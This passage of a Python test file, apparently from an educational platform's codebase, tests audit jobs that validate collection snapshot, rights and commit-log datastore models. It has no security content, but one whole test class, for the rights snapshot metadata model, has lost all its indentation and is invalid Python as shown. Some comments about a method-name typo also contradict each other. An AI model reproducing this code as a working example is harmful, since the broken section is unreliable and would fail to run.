            collection_models.CollectionSnapshotMetadataModel.get_by_id(
                '0-1'))
        self.model_instance_1 = (
            collection_models.CollectionSnapshotMetadataModel.get_by_id(
                '1-1'))
        self.model_instance_2 = (
            collection_models.CollectionSnapshotMetadataModel.get_by_id(
                '2-1'))
        self.job_class = (
            prod_validation_jobs_one_off
            .CollectionSnapshotMetadataModelAuditOneOffJob)

    def test_standard_operation(self):
        # Updating collection '0' creates a fourth snapshot metadata model.
        collection_services.update_collection(
            self.owner_id, '0', [{
                'cmd': 'edit_collection_property',
                'property_name': 'title',
                'new_value': 'New title'
            }], 'Changes.')
        expected_output = [
            u'[u\'fully-validated CollectionSnapshotMetadataModel\', 4]']
        run_job_and_check_output(self, expected_output)

    def test_model_with_created_on_greater_than_last_updated(self):
        # created_on after last_updated violates the time-field relation check.
        self.model_instance_0.created_on = (
            self.model_instance_0.last_updated + datetime.timedelta(days=1))
        self.model_instance_0.put()
        expected_output = [(
            u'[u\'failed validation check for time field relation check '
            'of CollectionSnapshotMetadataModel\', '
            '[u\'Entity id %s: The created_on field has a value '
            '%s which is greater than the value '
            '%s of last_updated field\']]') % (
                self.model_instance_0.id,
                self.model_instance_0.created_on,
                self.model_instance_0.last_updated
            ), (
                u'[u\'fully-validated '
                'CollectionSnapshotMetadataModel\', 2]')]
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_last_updated_greater_than_current_time(self):
        self.model_instance_1.delete()
        self.model_instance_2.delete()
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'CollectionSnapshotMetadataModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
        # Freeze "now" at a mocked earlier datetime so the stored
        # last_updated value appears to be in the future.
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_collection_model_failure(self):
        # Deleting the collection leaves two orphaned snapshot metadata
        # models ('0-1' from creation and '0-2' from the deletion commit).
        collection_models.CollectionModel.get_by_id('0').delete(
            self.user_id, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for collection_ids '
                'field check of CollectionSnapshotMetadataModel\', '
                '[u"Entity id 0-1: based on field collection_ids '
                'having value 0, expect model CollectionModel with '
                'id 0 but it doesn\'t exist", u"Entity id 0-2: based on field '
                'collection_ids having value 0, expect model '
                'CollectionModel with id 0 but it doesn\'t exist"]]'
            ), (
                u'[u\'fully-validated '
                'CollectionSnapshotMetadataModel\', 2]')]
        run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_committer_model_failure(self):
        user_models.UserSettingsModel.get_by_id(self.user_id).delete()
        expected_output = [
            (
                u'[u\'failed validation check for committer_ids field '
                'check of CollectionSnapshotMetadataModel\', '
                '[u"Entity id 0-1: based on field committer_ids having '
                'value %s, expect model UserSettingsModel with id %s '
                'but it doesn\'t exist"]]'
            ) % (self.user_id, self.user_id), (
                u'[u\'fully-validated '
                'CollectionSnapshotMetadataModel\', 2]')]
        run_job_and_check_output(self, expected_output, sort=True)

    def test_invalid_collection_version_in_model_id(self):
        # Snapshot id '0-3' claims version 3, but the collection is only at
        # version 1, so the version check should fail.
        model_with_invalid_version_in_id = (
            collection_models.CollectionSnapshotMetadataModel(
                id='0-3', committer_id=self.owner_id, commit_type='edit',
                commit_message='msg', commit_cmds=[{}]))
        model_with_invalid_version_in_id.put()
        expected_output = [
            (
                u'[u\'failed validation check for collection model '
                'version check of CollectionSnapshotMetadataModel\', '
                '[u\'Entity id 0-3: Collection model corresponding to '
                'id 0 has a version 1 which is less than the version 3 in '
                'snapshot metadata model id\']]'
            ), (
                u'[u\'fully-validated CollectionSnapshotMetadataModel\', '
                '3]')]
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_invalid_commit_cmd_schema(self):
        # Fixed typo in the method name ('schmea' -> 'schema').
        # One command is missing a required attribute and the other carries
        # an extra one; each should be reported separately per command type.
        self.model_instance_0.commit_cmds = [{
            'cmd': 'add_collection_node',
        }, {
            'cmd': 'delete_collection_node',
            'invalid_attribute': 'invalid'
        }]
        self.model_instance_0.put()
        expected_output = [
            (
                u'[u\'failed validation check for commit cmd '
                'delete_collection_node check of '
                'CollectionSnapshotMetadataModel\', '
                '[u"Entity id 0-1: Commit command domain validation '
                'for command: {u\'cmd\': u\'delete_collection_node\', '
                'u\'invalid_attribute\': u\'invalid\'} failed with error: '
                'The following required attributes are missing: '
                'exploration_id, The following extra attributes '
                'are present: invalid_attribute"]]'
            ), (
                u'[u\'failed validation check for commit cmd '
                'add_collection_node check of '
                'CollectionSnapshotMetadataModel\', '
                '[u"Entity id 0-1: Commit command domain validation '
                'for command: {u\'cmd\': u\'add_collection_node\'} failed '
                'with error: The following required attributes are '
                'missing: exploration_id"]]'
            ), u'[u\'fully-validated CollectionSnapshotMetadataModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
class CollectionSnapshotContentModelValidatorTests(test_utils.GenericTestBase):
    """Tests for the one-off audit job that validates
    CollectionSnapshotContentModel.
    """

    def setUp(self):
        super(CollectionSnapshotContentModelValidatorTests, self).setUp()
        self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
        self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
        # Six explorations so each of the three collections below can
        # reference two of them as nodes.
        explorations = [exp_domain.Exploration.create_default_exploration(
            '%s' % i,
            title='title %d' % i,
            category='category%d' % i,
        ) for i in xrange(6)]
        for exp in explorations:
            exp_services.save_new_exploration(self.owner_id, exp)
        collections = [collection_domain.Collection.create_default_collection(
            '%s' % i,
            title='title %d' % i,
            category='category%d' % i,
            objective='objective%d' % i,
        ) for i in xrange(3)]
        for index, collection in enumerate(collections):
            collection.add_node('%s' % (index * 2))
            collection.add_node('%s' % (index * 2 + 1))
            collection_services.save_new_collection(self.owner_id, collection)
        self.model_instance_0 = (
            collection_models.CollectionSnapshotContentModel.get_by_id(
                '0-1'))
        self.model_instance_1 = (
            collection_models.CollectionSnapshotContentModel.get_by_id(
                '1-1'))
        self.model_instance_2 = (
            collection_models.CollectionSnapshotContentModel.get_by_id(
                '2-1'))
        self.job_class = (
            prod_validation_jobs_one_off
            .CollectionSnapshotContentModelAuditOneOffJob)

    def test_standard_operation(self):
        # Updating collection '0' creates a fourth snapshot content model.
        collection_services.update_collection(
            self.owner_id, '0', [{
                'cmd': 'edit_collection_property',
                'property_name': 'title',
                'new_value': 'New title'
            }], 'Changes.')
        expected_output = [
            u'[u\'fully-validated CollectionSnapshotContentModel\', 4]']
        run_job_and_check_output(self, expected_output)

    def test_model_with_created_on_greater_than_last_updated(self):
        # created_on after last_updated violates the time-field relation check.
        self.model_instance_0.created_on = (
            self.model_instance_0.last_updated + datetime.timedelta(days=1))
        self.model_instance_0.put()
        expected_output = [(
            u'[u\'failed validation check for time field relation check '
            'of CollectionSnapshotContentModel\', '
            '[u\'Entity id %s: The created_on field has a value '
            '%s which is greater than the value '
            '%s of last_updated field\']]') % (
                self.model_instance_0.id,
                self.model_instance_0.created_on,
                self.model_instance_0.last_updated
            ), (
                u'[u\'fully-validated '
                'CollectionSnapshotContentModel\', 2]')]
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_last_updated_greater_than_current_time(self):
        self.model_instance_1.delete()
        self.model_instance_2.delete()
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'CollectionSnapshotContentModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
        # Freeze "now" at a mocked earlier datetime so the stored
        # last_updated value appears to be in the future.
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_collection_model_failure(self):
        # Deleting the collection leaves two orphaned snapshot content
        # models ('0-1' from creation and '0-2' from the deletion commit).
        collection_models.CollectionModel.get_by_id('0').delete(
            self.owner_id, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for collection_ids '
                'field check of CollectionSnapshotContentModel\', '
                '[u"Entity id 0-1: based on field collection_ids '
                'having value 0, expect model CollectionModel with '
                'id 0 but it doesn\'t exist", u"Entity id 0-2: based on field '
                'collection_ids having value 0, expect model '
                'CollectionModel with id 0 but it doesn\'t exist"]]'
            ), (
                u'[u\'fully-validated '
                'CollectionSnapshotContentModel\', 2]')]
        run_job_and_check_output(self, expected_output, sort=True)

    def test_invalid_collection_version_in_model_id(self):
        # Snapshot id '0-3' claims version 3, but the collection is only at
        # version 1, so the version check should fail.
        model_with_invalid_version_in_id = (
            collection_models.CollectionSnapshotContentModel(
                id='0-3'))
        model_with_invalid_version_in_id.content = {}
        model_with_invalid_version_in_id.put()
        expected_output = [
            (
                u'[u\'failed validation check for collection model '
                'version check of CollectionSnapshotContentModel\', '
                '[u\'Entity id 0-3: Collection model corresponding to '
                'id 0 has a version 1 which is less than '
                'the version 3 in snapshot content model id\']]'
            ), (
                u'[u\'fully-validated CollectionSnapshotContentModel\', '
                '3]')]
        run_job_and_check_output(self, expected_output, sort=True)
class CollectionRightsModelValidatorTests(test_utils.GenericTestBase):
    """Tests for the one-off audit job that validates CollectionRightsModel."""

    def setUp(self):
        super(CollectionRightsModelValidatorTests, self).setUp()
        self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
        self.signup(USER_EMAIL, USER_NAME)
        self.user_id = self.get_user_id_from_email(USER_EMAIL)
        self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
        self.owner = user_services.UserActionsInfo(self.owner_id)
        editor_email = 'user@editor.com'
        viewer_email = 'user@viewer.com'
        self.signup(editor_email, 'editor')
        self.signup(viewer_email, 'viewer')
        self.editor_id = self.get_user_id_from_email(editor_email)
        self.viewer_id = self.get_user_id_from_email(viewer_email)
        # Six explorations so each of the three collections below can
        # reference two of them as nodes.
        explorations = [exp_domain.Exploration.create_default_exploration(
            '%s' % i,
            title='title %d' % i,
            category='category%d' % i,
        ) for i in xrange(6)]
        for exp in explorations:
            exp_services.save_new_exploration(self.owner_id, exp)
        collections = [collection_domain.Collection.create_default_collection(
            '%s' % i,
            title='title %d' % i,
            category='category%d' % i,
            objective='objective%d' % i,
        ) for i in xrange(3)]
        for index, collection in enumerate(collections):
            collection.add_node('%s' % (index * 2))
            collection.add_node('%s' % (index * 2 + 1))
            collection_services.save_new_collection(self.owner_id, collection)
        # Give collection '0' an editor and collection '2' a viewer so the
        # user-reference checks below have targets to delete.
        rights_manager.assign_role_for_collection(
            self.owner, '0', self.editor_id, rights_manager.ROLE_EDITOR)
        rights_manager.assign_role_for_collection(
            self.owner, '2', self.viewer_id, rights_manager.ROLE_VIEWER)
        self.model_instance_0 = (
            collection_models.CollectionRightsModel.get_by_id('0'))
        self.model_instance_1 = (
            collection_models.CollectionRightsModel.get_by_id('1'))
        self.model_instance_2 = (
            collection_models.CollectionRightsModel.get_by_id('2'))
        self.job_class = (
            prod_validation_jobs_one_off.CollectionRightsModelAuditOneOffJob)

    def test_standard_operation(self):
        rights_manager.publish_collection(self.owner, '0')
        expected_output = [
            u'[u\'fully-validated CollectionRightsModel\', 3]']
        run_job_and_check_output(self, expected_output)

    def test_model_with_created_on_greater_than_last_updated(self):
        # created_on after last_updated violates the time-field relation check.
        self.model_instance_0.created_on = (
            self.model_instance_0.last_updated + datetime.timedelta(days=1))
        self.model_instance_0.commit(
            feconf.SYSTEM_COMMITTER_ID, 'created_on test', [])
        expected_output = [(
            u'[u\'failed validation check for time field relation check '
            'of CollectionRightsModel\', '
            '[u\'Entity id %s: The created_on field has a value '
            '%s which is greater than the value '
            '%s of last_updated field\']]') % (
                self.model_instance_0.id,
                self.model_instance_0.created_on,
                self.model_instance_0.last_updated
            ), u'[u\'fully-validated CollectionRightsModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_last_updated_greater_than_current_time(self):
        self.model_instance_1.delete(feconf.SYSTEM_COMMITTER_ID, 'delete')
        self.model_instance_2.delete(feconf.SYSTEM_COMMITTER_ID, 'delete')
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'CollectionRightsModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
        # Freeze "now" at a mocked earlier datetime so the stored
        # last_updated value appears to be in the future.
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_first_published_msec_greater_than_current_time(self):
        # Renamed from the garbled
        # test_model_with_first_published_datetime_than_current_time: the
        # check exercised here is first_published_msec vs the current time.
        rights_manager.publish_collection(self.owner, '0')
        rights_manager.publish_collection(self.owner, '1')
        # Inflate first_published_msec far into the future.
        self.model_instance_0.first_published_msec = (
            self.model_instance_0.first_published_msec * 1000000.0)
        self.model_instance_0.commit(feconf.SYSTEM_COMMITTER_ID, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for first published msec check '
                'of CollectionRightsModel\', '
                '[u\'Entity id 0: The first_published_msec field has a '
                'value %s which is greater than the time when the job was '
                'run\']]'
            ) % (self.model_instance_0.first_published_msec),
            u'[u\'fully-validated CollectionRightsModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_collection_model_failure(self):
        collection_models.CollectionModel.get_by_id('0').delete(
            feconf.SYSTEM_COMMITTER_ID, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for collection_ids '
                'field check of CollectionRightsModel\', '
                '[u"Entity id 0: based on field collection_ids having '
                'value 0, expect model CollectionModel with id 0 but '
                'it doesn\'t exist"]]'),
            u'[u\'fully-validated CollectionRightsModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_owner_user_model_failure(self):
        rights_manager.assign_role_for_collection(
            self.owner, '0', self.user_id, rights_manager.ROLE_OWNER)
        user_models.UserSettingsModel.get_by_id(self.user_id).delete()
        expected_output = [
            (
                u'[u\'failed validation check for owner_user_ids '
                'field check of CollectionRightsModel\', '
                '[u"Entity id 0: based on field owner_user_ids having '
                'value %s, expect model UserSettingsModel with id %s '
                'but it doesn\'t exist"]]') % (self.user_id, self.user_id),
            u'[u\'fully-validated CollectionRightsModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_editor_user_model_failure(self):
        user_models.UserSettingsModel.get_by_id(self.editor_id).delete()
        expected_output = [
            (
                u'[u\'failed validation check for editor_user_ids '
                'field check of CollectionRightsModel\', '
                '[u"Entity id 0: based on field editor_user_ids having '
                'value %s, expect model UserSettingsModel with id %s but '
                'it doesn\'t exist"]]') % (
                    self.editor_id, self.editor_id),
            u'[u\'fully-validated CollectionRightsModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_viewer_user_model_failure(self):
        user_models.UserSettingsModel.get_by_id(self.viewer_id).delete()
        expected_output = [
            (
                u'[u\'failed validation check for viewer_user_ids '
                'field check of CollectionRightsModel\', '
                '[u"Entity id 2: based on field viewer_user_ids having '
                'value %s, expect model UserSettingsModel with id %s but '
                'it doesn\'t exist"]]') % (
                    self.viewer_id, self.viewer_id),
            u'[u\'fully-validated CollectionRightsModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_snapshot_metadata_model_failure(self):
        collection_models.CollectionRightsSnapshotMetadataModel.get_by_id(
            '0-1').delete()
        expected_output = [
            (
                u'[u\'failed validation check for snapshot_metadata_ids '
                'field check of CollectionRightsModel\', '
                '[u"Entity id 0: based on field snapshot_metadata_ids having '
                'value 0-1, expect model '
                'CollectionRightsSnapshotMetadataModel '
                'with id 0-1 but it doesn\'t exist"]]'
            ),
            u'[u\'fully-validated CollectionRightsModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_snapshot_content_model_failure(self):
        collection_models.CollectionRightsSnapshotContentModel.get_by_id(
            '0-1').delete()
        expected_output = [
            (
                u'[u\'failed validation check for snapshot_content_ids '
                'field check of CollectionRightsModel\', '
                '[u"Entity id 0: based on field snapshot_content_ids having '
                'value 0-1, expect model CollectionRightsSnapshotContentModel '
                'with id 0-1 but it doesn\'t exist"]]'),
            u'[u\'fully-validated CollectionRightsModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
class CollectionRightsSnapshotMetadataModelValidatorTests(
test_utils.GenericTestBase):
def setUp(self):
super(CollectionRightsSnapshotMetadataModelValidatorTests, self).setUp(
)
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.signup(USER_EMAIL, USER_NAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.user_id = self.get_user_id_from_email(USER_EMAIL)
explorations = [exp_domain.Exploration.create_default_exploration(
'%s' % i,
title='title %d' % i,
category='category%d' % i,
) for i in xrange(6)]
for exp in explorations:
exp_services.save_new_exploration(self.owner_id, exp)
collections = [collection_domain.Collection.create_default_collection(
'%s' % i,
title='title %d' % i,
category='category%d' % i,
objective='objective%d' % i,
) for i in xrange(3)]
for index, collection in enumerate(collections):
collection.add_node('%s' % (index * 2))
collection.add_node('%s' % (index * 2 + 1))
if collection.id != '0':
collection_services.save_new_collection(
self.owner_id, collection)
else:
collection_services.save_new_collection(
self.user_id, collection)
self.model_instance_0 = (
collection_models.CollectionRightsSnapshotMetadataModel.get_by_id(
'0-1'))
self.model_instance_1 = (
collection_models.CollectionRightsSnapshotMetadataModel.get_by_id(
'1-1'))
self.model_instance_2 = (
collection_models.CollectionRightsSnapshotMetadataModel.get_by_id(
'2-1'))
self.job_class = (
prod_validation_jobs_one_off
.CollectionRightsSnapshotMetadataModelAuditOneOffJob)
def test_standard_operation(self):
expected_output = [
u'[u\'fully-validated CollectionRightsSnapshotMetadataModel\', 3]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance_0.created_on = (
self.model_instance_0.last_updated + datetime.timedelta(days=1))
self.model_instance_0.put()
expected_output = [(
u'[u\'failed validation check for time field relation check '
'of CollectionRightsSnapshotMetadataModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance_0.id,
self.model_instance_0.created_on,
self.model_instance_0.last_updated
), (
u'[u\'fully-validated '
'CollectionRightsSnapshotMetadataModel\', 2]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
self.model_instance_1.delete()
self.model_instance_2.delete()
expected_output = [(
u'[u\'failed validation check for current time check of '
'CollectionRightsSnapshotMetadataModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_collection_rights_model_failure(self):
collection_models.CollectionRightsModel.get_by_id('0').delete(
self.user_id, '', [])
expected_output = [
(
u'[u\'failed validation check for collection_rights_ids '
'field check of CollectionRightsSnapshotMetadataModel\', '
'[u"Entity id 0-1: based on field collection_rights_ids '
'having value 0, expect model CollectionRightsModel with '
'id 0 but it doesn\'t exist", u"Entity id 0-2: based on field '
'collection_rights_ids having value 0, expect model '
'CollectionRightsModel with id 0 but it doesn\'t exist"]]'
), (
u'[u\'fully-validated '
'CollectionRightsSnapshotMetadataModel\', 2]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_committer_model_failure(self):
user_models.UserSettingsModel.get_by_id(self.user_id).delete()
expected_output = [
(
u'[u\'failed validation check for committer_ids field '
'check of CollectionRightsSnapshotMetadataModel\', '
'[u"Entity id 0-1: based on field committer_ids having '
'value %s, expect model UserSettingsModel with id %s '
'but it doesn\'t exist"]]'
) % (self.user_id, self.user_id), (
u'[u\'fully-validated '
'CollectionRightsSnapshotMetadataModel\', 2]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_invalid_collection_version_in_model_id(self):
model_with_invalid_version_in_id = (
collection_models.CollectionRightsSnapshotMetadataModel(
id='0-3', committer_id=self.owner_id, commit_type='edit',
commit_message='msg', commit_cmds=[{}]))
model_with_invalid_version_in_id.put()
expected_output = [
(
u'[u\'failed validation check for collection rights model '
'version check of CollectionRightsSnapshotMetadataModel\', '
'[u\'Entity id 0-3: CollectionRights model corresponding to '
'id 0 has a version 1 which is less than the version 3 in '
'snapshot metadata model id\']]'
), (
u'[u\'fully-validated '
'CollectionRightsSnapshotMetadataModel\', 3]')]
run_job_and_check_output(self, expected_output, sort=True)
    # NOTE(review): 'schmea' in the method name is a typo for 'schema';
    # kept as-is to preserve the existing test id.
    def test_model_with_invalid_commit_cmd_schmea(self):
        """Commit cmds that violate their command schemas (a missing
        required attribute and an unexpected extra attribute) each produce
        a per-command validation failure.
        """
        self.model_instance_0.commit_cmds = [{
            # Missing the required 'new_status' attribute.
            'cmd': 'change_collection_status',
            'old_status': rights_manager.ACTIVITY_STATUS_PUBLIC,
        }, {
            # 'release_ownership' takes no extra attributes.
            'cmd': 'release_ownership',
            'invalid_attribute': 'invalid'
        }]
        self.model_instance_0.put()
        expected_output = [
            (
                u'[u\'failed validation check for commit cmd '
                'change_collection_status check of '
                'CollectionRightsSnapshotMetadataModel\', '
                '[u"Entity id 0-1: Commit command domain validation for '
                'command: {u\'old_status\': u\'public\', '
                'u\'cmd\': u\'change_collection_status\'} failed with error: '
                'The following required attributes are missing: '
                'new_status"]]'
            ), (
                u'[u\'failed validation check for commit cmd '
                'release_ownership check of '
                'CollectionRightsSnapshotMetadataModel\', '
                '[u"Entity id 0-1: Commit command domain validation '
                'for command: {u\'cmd\': u\'release_ownership\', '
                'u\'invalid_attribute\': u\'invalid\'} failed with error: '
                'The following extra attributes are present: '
                'invalid_attribute"]]'
            ), (
                u'[u\'fully-validated '
                'CollectionRightsSnapshotMetadataModel\', 2]')]
        run_job_and_check_output(self, expected_output, sort=True)
class CollectionRightsSnapshotContentModelValidatorTests(
        test_utils.GenericTestBase):
    """Tests for the CollectionRightsSnapshotContentModel audit job."""

    def setUp(self):
        """Creates 6 explorations and 3 two-node collections (ids 0-2),
        which yields one rights snapshot content model per collection.
        """
        super(CollectionRightsSnapshotContentModelValidatorTests, self).setUp(
        )
        self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
        self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
        explorations = [exp_domain.Exploration.create_default_exploration(
            '%s' % i,
            title='title %d' % i,
            category='category%d' % i,
        ) for i in xrange(6)]
        for exp in explorations:
            exp_services.save_new_exploration(self.owner_id, exp)
        collections = [collection_domain.Collection.create_default_collection(
            '%s' % i,
            title='title %d' % i,
            category='category%d' % i,
            objective='objective%d' % i,
        ) for i in xrange(3)]
        for index, collection in enumerate(collections):
            # Collection i owns explorations 2i and 2i+1.
            collection.add_node('%s' % (index * 2))
            collection.add_node('%s' % (index * 2 + 1))
            collection_services.save_new_collection(self.owner_id, collection)
        self.model_instance_0 = (
            collection_models.CollectionRightsSnapshotContentModel.get_by_id(
                '0-1'))
        self.model_instance_1 = (
            collection_models.CollectionRightsSnapshotContentModel.get_by_id(
                '1-1'))
        self.model_instance_2 = (
            collection_models.CollectionRightsSnapshotContentModel.get_by_id(
                '2-1'))
        self.job_class = (
            prod_validation_jobs_one_off
            .CollectionRightsSnapshotContentModelAuditOneOffJob)
    def test_standard_operation(self):
        """All three snapshot content models validate cleanly."""
        expected_output = [
            u'[u\'fully-validated CollectionRightsSnapshotContentModel\', 3]']
        run_job_and_check_output(self, expected_output)
    def test_model_with_created_on_greater_than_last_updated(self):
        """created_on later than last_updated fails the time-relation
        check.
        """
        self.model_instance_0.created_on = (
            self.model_instance_0.last_updated + datetime.timedelta(days=1))
        self.model_instance_0.put()
        expected_output = [(
            u'[u\'failed validation check for time field relation check '
            'of CollectionRightsSnapshotContentModel\', '
            '[u\'Entity id %s: The created_on field has a value '
            '%s which is greater than the value '
            '%s of last_updated field\']]') % (
                self.model_instance_0.id,
                self.model_instance_0.created_on,
                self.model_instance_0.last_updated
            ), (
                u'[u\'fully-validated '
                'CollectionRightsSnapshotContentModel\', 2]')]
        run_job_and_check_output(self, expected_output, sort=True)
    def test_model_with_last_updated_greater_than_current_time(self):
        """A last_updated in the future (simulated by mocking datetime
        backwards 13 hours) fails the current-time check.
        """
        # Delete the other models so only instance 0 is reported.
        self.model_instance_1.delete()
        self.model_instance_2.delete()
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'CollectionRightsSnapshotContentModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output, sort=True)
    def test_missing_collection_model_failure(self):
        """Deleting the parent CollectionRightsModel makes the snapshot
        content models for both of its versions dangle.
        """
        collection_models.CollectionRightsModel.get_by_id('0').delete(
            self.owner_id, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for collection_rights_ids '
                'field check of CollectionRightsSnapshotContentModel\', '
                '[u"Entity id 0-1: based on field collection_rights_ids '
                'having value 0, expect model CollectionRightsModel with '
                'id 0 but it doesn\'t exist", u"Entity id 0-2: based on field '
                'collection_rights_ids having value 0, expect model '
                'CollectionRightsModel with id 0 but it doesn\'t exist"]]'
            ), (
                u'[u\'fully-validated '
                'CollectionRightsSnapshotContentModel\', 2]')]
        run_job_and_check_output(self, expected_output, sort=True)
    def test_invalid_collection_version_in_model_id(self):
        """A snapshot content model id encoding a version greater than
        the current rights model version fails the version check.
        """
        model_with_invalid_version_in_id = (
            collection_models.CollectionRightsSnapshotContentModel(
                id='0-3'))
        model_with_invalid_version_in_id.content = {}
        model_with_invalid_version_in_id.put()
        expected_output = [
            (
                u'[u\'failed validation check for collection rights model '
                'version check of CollectionRightsSnapshotContentModel\', '
                '[u\'Entity id 0-3: CollectionRights model corresponding to '
                'id 0 has a version 1 which is less than the version 3 in '
                'snapshot content model id\']]'
            ), (
                u'[u\'fully-validated CollectionRightsSnapshotContentModel\', '
                '3]')]
        run_job_and_check_output(self, expected_output, sort=True)
class CollectionCommitLogEntryModelValidatorTests(test_utils.GenericTestBase):
    """Tests for the CollectionCommitLogEntryModel audit job."""

    def setUp(self):
        """Creates 6 explorations and 3 two-node collections, plus one
        hand-crafted rights commit log entry ('rights-1-1') alongside the
        three auto-created collection commit log entries.
        """
        super(CollectionCommitLogEntryModelValidatorTests, self).setUp()
        self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
        self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
        explorations = [exp_domain.Exploration.create_default_exploration(
            '%s' % i,
            title='title %d' % i,
            category='category%d' % i,
        ) for i in xrange(6)]
        for exp in explorations:
            exp_services.save_new_exploration(self.owner_id, exp)
        collections = [collection_domain.Collection.create_default_collection(
            '%s' % i,
            title='title %d' % i,
            category='category%d' % i,
            objective='objective%d' % i,
        ) for i in xrange(3)]
        for index, collection in enumerate(collections):
            # Collection i owns explorations 2i and 2i+1.
            collection.add_node('%s' % (index * 2))
            collection.add_node('%s' % (index * 2 + 1))
            collection_services.save_new_collection(self.owner_id, collection)
        self.rights_model_instance = (
            collection_models.CollectionCommitLogEntryModel(
                id='rights-1-1', user_id=self.owner_id,
                username=self.OWNER_USERNAME, collection_id='1',
                commit_type='edit', commit_message='', commit_cmds=[],
                post_commit_status=constants.ACTIVITY_STATUS_PUBLIC,
                post_commit_community_owned=False,
                post_commit_is_private=False))
        self.rights_model_instance.put()
        self.model_instance_0 = (
            collection_models.CollectionCommitLogEntryModel.get_by_id(
                'collection-0-1'))
        self.model_instance_1 = (
            collection_models.CollectionCommitLogEntryModel.get_by_id(
                'collection-1-1'))
        self.model_instance_2 = (
            collection_models.CollectionCommitLogEntryModel.get_by_id(
                'collection-2-1'))
        self.job_class = (
            prod_validation_jobs_one_off
            .CollectionCommitLogEntryModelAuditOneOffJob)
    def test_standard_operation(self):
        """An extra update creates a fifth entry; all validate cleanly."""
        collection_services.update_collection(
            self.owner_id, '0', [{
                'cmd': 'edit_collection_property',
                'property_name': 'title',
                'new_value': 'New title'
            }], 'Changes.')
        expected_output = [
            u'[u\'fully-validated CollectionCommitLogEntryModel\', 5]']
        run_job_and_check_output(self, expected_output)
    def test_model_with_created_on_greater_than_last_updated(self):
        """created_on later than last_updated fails the time-relation
        check.
        """
        self.model_instance_0.created_on = (
            self.model_instance_0.last_updated + datetime.timedelta(days=1))
        self.model_instance_0.put()
        expected_output = [(
            u'[u\'failed validation check for time field relation check '
            'of CollectionCommitLogEntryModel\', '
            '[u\'Entity id %s: The created_on field has a value '
            '%s which is greater than the value '
            '%s of last_updated field\']]') % (
                self.model_instance_0.id,
                self.model_instance_0.created_on,
                self.model_instance_0.last_updated
            ), u'[u\'fully-validated CollectionCommitLogEntryModel\', 3]']
        run_job_and_check_output(self, expected_output, sort=True)
    def test_model_with_last_updated_greater_than_current_time(self):
        """A last_updated in the future (simulated by mocking datetime
        backwards 13 hours) fails the current-time check.
        """
        # Delete all entries except instance 0 so only it is reported.
        self.model_instance_1.delete()
        self.model_instance_2.delete()
